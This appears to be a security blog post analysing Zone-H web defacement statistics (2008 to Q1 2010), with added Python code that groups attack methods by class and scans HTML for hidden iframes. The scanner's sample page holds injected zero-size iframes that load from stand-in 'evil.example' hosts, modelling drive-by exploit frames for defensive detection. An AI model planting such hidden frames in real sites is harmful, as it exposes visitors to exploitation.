Web defacements are a serious problem and a useful barometer of how many exploitable vulnerabilities exist in websites. Unfortunately, most people focus on the outcome of these attacks (the altered page) rather than on the fact that their web applications, and the hosts behind them, were vulnerable to this level of exploitation. They forget the standard risk equation:
RISK = THREAT x VULNERABILITY x IMPACT
The resulting risk of a web defacement may be rated low because the impact is not deemed severe enough for a particular organization. What most people miss, however, is that the threat and vulnerability components of the equation are unchanged: the same access that lets an attacker alter some homepage content lets them do something more damaging, such as planting malicious code to infect visiting clients.
Zone-H Statistics Report for 2008-2009-Q1 2010
Zone-H is a clearing house that has tracked web defacements for a number of years. At the end of May 2010 they released a statistics report correlating data from 2008, 2009 and the first quarter of 2010, and it contains some very interesting numbers.
What Attacks Were Being Used?
The first piece of data that caught my eye was the table listing the attack methods that were successfully employed and resulted in enough system access to alter the website content.
| Attack Method | Total 2008 | Total 2009 | Total Q1 2010 |
|---|---:|---:|---:|
| Attack against the administrator/user (password stealing/sniffing) | 33,141 | 24,386 | 10,918 |
| Access credentials through Man In the Middle attack | 37,526 | 7,385 | 1,005 |
| Other Web Application bug | 36,832 | 99,546 | 42,874 |
| FTP Server intrusion | 32,521 | 11,749 | 5,138 |
| Web Server intrusion | 8,334 | 9,820 | 7,400 |
| DNS attack through cache poisoning | 7,541 | 3,289 | 1,361 |
| Other Server intrusion | 5,655 | 10,799 | 5,123 |
| DNS attack through social engineering | 6,310 | 2,847 | 1,358 |
| Web Server external module intrusion | 4,967 | 2,265 | 1,313 |
| Remote administrative panel access through bruteforcing | 9,991 | 6,862 | 7,046 |
| Rerouting after attacking the Firewall | 8,143 | 3,107 | 1,267 |
| SSH Server intrusion | 6,231 | 4,624 | 4,550 |
| RPC Server intrusion | 12,359 | 5,821 | 2,512 |
| Rerouting after attacking the Router | 9,170 | 2,671 | 1,327 |
| Remote service password guessing | 6,641 | 3,252 | 1,103 |
| Telnet Server intrusion | 4,050 | 3,476 | 2,562 |
| Remote administrative panel access through password guessing | 4,915 | 1,139 | 422 |
| Remote administrative panel access through social engineering | 4,431 | 1,502 | 472 |
| Remote service password bruteforce | 5,563 | 3,658 | 1,002 |
| Mail Server intrusion | 1,441 | 2,314 | 1,121 |
| Not available | 70,457 | 87,684 | 24,493 |

(Counts are as published by Zone-H; the 2010 column covers only the first quarter of that year.)
Lesson Learned #1 - Web Security Goes Beyond Securing the Web Application Itself
The first concept the table reinforces is that the majority of successful attack vectors had nothing to do with the web application itself. "Other Web Application bug" is the largest single category in 2009 and Q1 2010, yet it still accounts for under half of the attributed defacements (roughly 99.5k of about 210k in 2009, and only about 15% in 2008, when credential theft via man-in-the-middle was the top entry). The remainder came from other services installed on the same hosts (FTP, SSH, Telnet, RPC, mail), from stolen, guessed or brute-forced credentials, or from DNS cache poisoning and rerouting, which only give the "illusion" that the real website was defaced by sending visitors somewhere else. Two caveats: the method is the one recorded in the notification submitted to Zone-H, and "Not available" is the largest bucket in every period, so treat the split as indicative rather than exact. Even so, these statistics should be a wake-up call for organizations to truly embrace defense-in-depth and re-evaluate their network- and host-level security posture, not just the web application.
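To make this lesson checkable rather than a matter of eyeballing the table, here is an added Python example (not code from the post or from Zone-H) that takes the counts transcribed from the Zone-H table above, groups the individual methods into broader attack classes, and computes each class's share per period. The grouping of methods into classes is this example's own assumption, not Zone-H's taxonomy, and the "Not available" rows are excluded from the shares but reported separately.

```python
"""Share of Zone-H defacement methods by attack class (2008, 2009, Q1 2010).

Added example, not code from the post or from Zone-H. The counts are
transcribed from the Zone-H table; grouping methods into classes is
this example's own assumption, not Zone-H's taxonomy.
"""
from collections import defaultdict

PERIODS = ("2008", "2009", "Q1 2010")

# (method, 2008, 2009, Q1 2010) exactly as listed in the Zone-H table.
ZONE_H_COUNTS = [
    ("Attack against the administrator/user (password stealing/sniffing)", 33141, 24386, 10918),
    ("Access credentials through Man In the Middle attack", 37526, 7385, 1005),
    ("Other Web Application bug", 36832, 99546, 42874),
    ("FTP Server intrusion", 32521, 11749, 5138),
    ("Web Server intrusion", 8334, 9820, 7400),
    ("DNS attack through cache poisoning", 7541, 3289, 1361),
    ("Other Server intrusion", 5655, 10799, 5123),
    ("DNS attack through social engineering", 6310, 2847, 1358),
    ("Web Server external module intrusion", 4967, 2265, 1313),
    ("Remote administrative panel access through bruteforcing", 9991, 6862, 7046),
    ("Rerouting after attacking the Firewall", 8143, 3107, 1267),
    ("SSH Server intrusion", 6231, 4624, 4550),
    ("RPC Server intrusion", 12359, 5821, 2512),
    ("Rerouting after attacking the Router", 9170, 2671, 1327),
    ("Remote service password guessing", 6641, 3252, 1103),
    ("Telnet Server intrusion", 4050, 3476, 2562),
    ("Remote administrative panel access through password guessing", 4915, 1139, 422),
    ("Remote administrative panel access through social engineering", 4431, 1502, 472),
    ("Remote service password bruteforce", 5563, 3658, 1002),
    ("Mail Server intrusion", 1441, 2314, 1121),
    ("Not available", 70457, 87684, 24493),
]

# Our own grouping (an assumption): which broad class each Zone-H method falls in.
CLASSES = {
    "web application": ["Other Web Application bug"],
    "web server platform": ["Web Server intrusion", "Web Server external module intrusion"],
    "stolen credentials": ["Attack against the administrator/user (password stealing/sniffing)",
                           "Access credentials through Man In the Middle attack"],
    "guessed or social-engineered credentials": [
        "Remote administrative panel access through bruteforcing",
        "Remote administrative panel access through password guessing",
        "Remote administrative panel access through social engineering",
        "Remote service password guessing", "Remote service password bruteforce"],
    "other network service": ["FTP Server intrusion", "SSH Server intrusion", "RPC Server intrusion",
                              "Telnet Server intrusion", "Mail Server intrusion", "Other Server intrusion"],
    "DNS or network rerouting": ["DNS attack through cache poisoning", "DNS attack through social engineering",
                                 "Rerouting after attacking the Firewall", "Rerouting after attacking the Router"],
}
CLASS_OF = {method: cls for cls, methods in CLASSES.items() for method in methods}

def class_totals(period):
    """Sum the counts of every attributed method per class ('Not available' is dropped)."""
    col = PERIODS.index(period) + 1
    totals = defaultdict(int)
    for row in ZONE_H_COUNTS:
        if row[0] != "Not available":
            totals[CLASS_OF[row[0]]] += row[col]  # a KeyError here means an unmapped method
    return dict(totals)

def class_shares(period):
    """Each class's fraction of the attributed defacements in a period."""
    totals = class_totals(period)
    attributed = sum(totals.values())
    return {cls: n / attributed for cls, n in totals.items()}

def non_web_app_share(period):
    """Fraction of attributed defacements that did not go through a web application bug."""
    return 1.0 - class_shares(period).get("web application", 0.0)

def unattributed_share(period):
    """Fraction of all defacements whose method was recorded as 'Not available'."""
    col = PERIODS.index(period) + 1
    total = sum(row[col] for row in ZONE_H_COUNTS)
    missing = next(row[col] for row in ZONE_H_COUNTS if row[0] == "Not available")
    return missing / total

def report():
    """Per-period breakdown as text, for checking Lesson #1 against the numbers."""
    lines = []
    for period in PERIODS:
        lines.append(f"{period}: {non_web_app_share(period):.0%} of attributed defacements did not use "
                     f"a web application bug; {unattributed_share(period):.0%} of all had no method recorded")
        for cls, share in sorted(class_shares(period).items(), key=lambda kv: -kv[1]):
            lines.append(f"  {share:6.1%}  {cls}")
    return "\n".join(lines)

if __name__ == "__main__":
    print(report())
```

Run it and the non-web-application share comes out above 50% in all three periods, narrowly so in 2009 and Q1 2010. Swapping in a different grouping (for example, counting "Web Server intrusion" as web-tier) is a one-line change to CLASSES, which is the point: the conclusion should survive reasonable re-bucketing, and here it does.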
Lesson Learned #2 - Vulnerability Prevalence Statistics vs. Attack Vectors used in Compromises
There are many community projects and resources that track web vulnerabilities, such as Bugtraq, CVE and OSVDB. These are tremendously useful for gauging the raw number of vulnerabilities that exist in public and commercial web software. The WASC Web Application Security Statistics Project adds data on vulnerabilities that are remotely exploitable in both public and custom-coded applications. All of this helps to define the overall attack surface available to attackers and the Vulnerability component of the RISK equation mentioned earlier. It shows what COULD be exploited; for an incident to occur there must also be a threat (an attacker) and a desired outcome (such as a website defacement). The Zone-H data shows which vectors attackers actually used to reach that outcome, and organizations should use it to prioritize remediation of those specific attack vectors.
Lesson Learned #3 - Web Defacers Are Migrating To Installing Malicious Code
Zone-H outlines this concept at the beginning of their report:
Worms and viruses like mpack/zeus variants also allow some crackers to gather ftp account credentials, but most of the people using those tools do not deface websites, but prefer to backdoor those sites with iframe exploits in order to hack more and more users, and to steal data from them. Iskorpitx for example (but many others do it as well) uses this method to break into hostings; he usually steals credentials with viruses and sometimes even backdoors the defacements for visitors of the defaced sites to be exploited.
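The shift Zone-H describes, from altering a page to quietly planting an iframe that pulls an exploit page into every visitor's browser, is easy to miss precisely because the site looks untouched. As an added example (not code from Zone-H or from this post), here is a small Python scanner that flags `<iframe>` tags sized to zero or one pixel or styled invisible, which is how such injected frames typically hide in static markup. The sample page and the `evil.example` hostnames are constructed for the demonstration.

```python
"""Flag hidden <iframe> tags in HTML, a common sign of an injected drive-by frame.

Added example, not code from Zone-H or from the post. SAMPLE_PAGE and the
evil.example hostnames are constructed for the demonstration.
"""
import os
from html.parser import HTMLParser

# Style fragments that keep a frame in the page while making it invisible.
HIDING_STYLES = ("visibility:hidden", "display:none")


class HiddenIframeFinder(HTMLParser):
    """Collects <iframe> start tags whose attributes suggest they were meant not to be seen."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":  # HTMLParser lower-cases tag and attribute names for us
            return
        attr = {name: (value or "") for name, value in attrs}
        reasons = []
        for dim in ("width", "height"):
            value = attr.get(dim, "").strip().lower()
            if value.endswith("px"):
                value = value[:-2].strip()
            if value.isdigit() and int(value) <= 1:  # 0x0 or 1x1 frames carry no visible content
                reasons.append(f"{dim}={attr[dim]}")
        style = attr.get("style", "").replace(" ", "").lower()
        reasons.extend(f"style has {s}" for s in HIDING_STYLES if s in style)
        if reasons:
            self.findings.append({"line": self.getpos()[0], "src": attr.get("src", ""), "reasons": reasons})


def find_hidden_iframes(html):
    """Return the suspicious iframes (line number, src, why) found in one HTML document."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


def scan_tree(root, extensions=(".html", ".htm", ".php")):
    """Walk a document root and map each file with hidden iframes to its findings."""
    results = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    results[path] = hits
    return results


# Constructed sample: one legitimate embed followed by two injected, hidden frames.
SAMPLE_PAGE = """<html><head><title>Acme Widgets</title></head>
<body>
<h1>Welcome to Acme</h1>
<iframe src="https://video.example/embed/42" width="560" height="315"></iframe>
<p>Contact us at the usual address.</p>
<iframe src="http://evil.example/in.php" width="0" height="0" style="visibility: hidden"></iframe>
<IFRAME SRC="http://evil.example/ld.php" WIDTH=1 HEIGHT=1 FRAMEBORDER=0></IFRAME>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_PAGE):
        print(f"line {hit['line']}: src={hit['src']!r} ({', '.join(hit['reasons'])})")
```

This catches only frames present in the static markup. A frame written at runtime by obfuscated JavaScript (a `document.write` of an unescaped string, for instance) is invisible to this parser until the script is decoded or executed, so a clean result is necessary, not sufficient. Pair it with a diff of the web root against a known-good copy or the deployment's version control, which is what actually proves the content was changed.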